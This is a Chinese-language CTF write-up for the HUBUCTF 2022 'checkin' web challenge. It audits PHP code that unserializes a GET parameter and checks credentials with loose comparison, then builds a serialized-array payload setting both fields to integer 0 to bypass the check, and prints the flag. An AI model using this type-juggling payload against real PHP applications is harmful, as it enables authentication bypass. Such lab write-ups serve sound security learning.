[HUBUCTF 2022 新生赛]checkin

题目来源：nssctf

题目类型：web

涉及考点：PHP反序列化

前言

昨天玩的有点猛了，忘记写wp了，今天补上两篇

1. 先看题目，给了一串代码，做代码审计

<?php
show_source(__FILE__);
$username  = "this_is_secret"; 
$password  = "this_is_not_known_to_you"; 
include("flag.php");//here I changed those two 
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";

}
?>

涉及反序列化的知识会在后续的博客中详细介绍（待补充href），这里不做赘述

题目要求GET传入一个info，并对info做反序列化，使得反序列化后的数组中，对应的$data_unserialize['username']==$username，$data_unserialize['password']==$password

2. 我们先利用php在线构造出我们需要的数组的序列化字符串

得到结果如下：

于是我们构造payload：

/?info=a:2:{s:8:"username";s:14:"this_is_secret";s:8:"password";s:24:"this_is_not_known_to_you";}

还是不对

注意到第五行中的注释，说改变了两者的值

3. 结合弱比较再次构造payload

if语句中使用双等号判断，可以想到使用弱比较

字符串在和数字比较的时候会将字符串转化为数字，当字符串开头没有数字时，则转化失败为false

于是猜想username和password改变后开头仍没有数字，那么数组里的值我们直接设置为0：

于是构造payload如下：

/?info=a:2:{s:8:"username";i:0;s:8:"password";i:0;}

得到flag：

NSSCTF{df71c00d-151b-4fad-b75e-82bc403e7a51}

日期：2023.7.27

作者：y0Zero

本栏目推荐文章
• AtCoder World Tour 2022 B The Greatest Two
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• 多态和虚函数 [补档-2022-10-23]
• 深拷贝和浅拷贝的问题 [补档-2022-10-22]
• P8368 [LNOI2022] 串
• origin2022导出图有水印
• 【专题】2022云上新型电力系统报告PDF合集分享（附原数据表）
• 2022 Jiangsu Collegiate Programming Contest
• VS2013项目升级VS2022
• Visual Studio 2022密钥

新生 HUBUCTF checkin 2022新生hubuctf checkin 2022 ezpython新生hubuctf 2022 迷宫 新生hubuctf 2022 simple_re新生hubuctf simple 随机数pwn新生hubuctf nisactf checkin 2022 题解 新生 石头2022 easystack新生uuctf 2022 新生uuctf 2022 新生ez_rce uuctf 2022